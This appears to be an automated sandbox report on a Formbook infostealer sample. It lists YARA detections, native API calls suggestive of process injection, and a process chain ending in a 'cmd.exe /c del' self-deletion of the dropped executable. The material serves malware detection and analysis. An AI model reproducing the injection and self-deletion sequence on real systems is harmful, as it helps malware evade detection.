          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\4505682666.exe, Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 02C5B150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: String function: 012AB150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_004185E0 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_00418690 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_00418710 NtClose
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_004187C0 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_0041883A NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_0041868A NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_004187BB NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E95D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9950 NtQueueApcThread
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E99D0 NtCreateProcessEx
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9820 NtEnumerateKey
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012EB040 NtSuspendThread
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E98A0 NtWriteVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9B00 NtSetValueKey
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012EA3B0 NtGetContextThread
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9A10 NtQuerySection
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9A80 NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9520 NtWaitForSingleObject
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012EAD30 NtSetContextThread
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9560 NtWriteFile
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E95F0 NtQueryInformationFile
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9730 NtQueryVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012EA710 NtOpenProcessToken
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9760 NtOpenProcess
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012EA770 NtOpenThread
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9770 NtSetInformationFile
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9610 NtEnumerateValueKey
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9670 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E9650 NtQueryValueKey
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4_2_012E96D0 NtCreateKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A50 NtCreateFile,LdrInitializeThunk,15_2_02C99A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99840 NtDelayExecution,LdrInitializeThunk,15_2_02C99840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99860 NtQuerySystemInformation,LdrInitializeThunk,15_2_02C99860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C999A0 NtCreateSection,LdrInitializeThunk,15_2_02C999A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_02C99910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C996D0 NtCreateKey,LdrInitializeThunk,15_2_02C996D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C996E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_02C996E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99650 NtQueryValueKey,LdrInitializeThunk,15_2_02C99650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_02C99660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99FE0 NtCreateMutant,LdrInitializeThunk,15_2_02C99FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99780 NtMapViewOfSection,LdrInitializeThunk,15_2_02C99780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99710 NtQueryInformationToken,LdrInitializeThunk,15_2_02C99710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C995D0 NtClose,LdrInitializeThunk,15_2_02C995D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99540 NtReadFile,LdrInitializeThunk,15_2_02C99540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A80 NtOpenDirectoryObject,15_2_02C99A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A00 NtProtectVirtualMemory,15_2_02C99A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A10 NtQuerySection,15_2_02C99A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A20 NtResumeThread,15_2_02C99A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9A3B0 NtGetContextThread,15_2_02C9A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99B00 NtSetValueKey,15_2_02C99B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C998F0 NtReadVirtualMemory,15_2_02C998F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C998A0 NtWriteVirtualMemory,15_2_02C998A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9B040 NtSuspendThread,15_2_02C9B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99820 NtEnumerateKey,15_2_02C99820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C999D0 NtCreateProcessEx,15_2_02C999D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99950 NtQueueApcThread,15_2_02C99950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99670 NtQueryInformationProcess,15_2_02C99670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99610 NtEnumerateValueKey,15_2_02C99610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C997A0 NtUnmapViewOfSection,15_2_02C997A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99760 NtOpenProcess,15_2_02C99760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9A770 NtOpenThread,15_2_02C9A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99770 NtSetInformationFile,15_2_02C99770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9A710 NtOpenProcessToken,15_2_02C9A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99730 NtQueryVirtualMemory,15_2_02C99730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C995F0 NtQueryInformationFile,15_2_02C995F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99560 NtWriteFile,15_2_02C99560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99520 NtWaitForSingleObject,15_2_02C99520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9AD30 NtSetContextThread,15_2_02C9AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_004385E0 NtCreateFile,15_2_004385E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00438690 NtReadFile,15_2_00438690
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00438710 NtClose,15_2_00438710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_004387C0 NtAllocateVirtualMemory,15_2_004387C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043883A NtAllocateVirtualMemory,15_2_0043883A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043868A NtReadFile,15_2_0043868A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_004387BB NtAllocateVirtualMemory,15_2_004387BB
          Source: 4505682666.exeVirustotal: Detection: 42%
          Source: 4505682666.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\4505682666.exeFile read: C:\Users\user\Desktop\4505682666.exeJump to behavior
          Source: 4505682666.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\4505682666.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\4505682666.exe "C:\Users\user\Desktop\4505682666.exe"
          Source: C:\Users\user\Desktop\4505682666.exeProcess created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\4505682666.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
          Source: C:\Users\user\Desktop\4505682666.exeFile created: C:\Users\user\AppData\Local\Temp\nsz176B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/3@7/4
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\4505682666.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 4505682666.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
